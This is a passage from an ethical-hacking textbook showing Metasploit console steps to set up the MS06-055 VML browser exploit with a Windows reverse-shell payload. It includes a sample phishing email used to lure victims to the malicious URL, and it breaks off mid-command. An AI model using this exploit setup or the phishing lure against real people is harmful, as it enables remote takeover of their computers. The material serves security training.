..
As you can see, there are several browser-based exploits built into Metasploit:
msf > use windows/browser/ms06_055_vml_method
msf exploit(ms06_055_vml_method) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.113 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit
(default is random)
Gray Hat Hacking: The Ethical Hacker??™s Handbook
84
Metasploit??™s browser-based vulnerabilities have a new option, URIPATH. Metasploit
will be acting as a web server (in this case, http://192.168.1.113:8080), so the URIPATH
is the rest of the URL to which you??™ll be luring your victim. In this example, pretend that
we??™ll be sending out an e-mail that looks like this:
???Dear [victim], Congratulations! You??™ve won one million dollars! For pickup
instructions, click here: [link]???
A good URL for that kind of attack might be something like http://192.168.1.113:8080/
you_win.htm.
msf exploit(ms06_055_vml_method) > set URIPATH you_win.htm
URIPATH => you_win.htm
msf exploit(ms06_055_vml_method) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms06_055_vml_method) > set LHOST 192.
Pages:
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221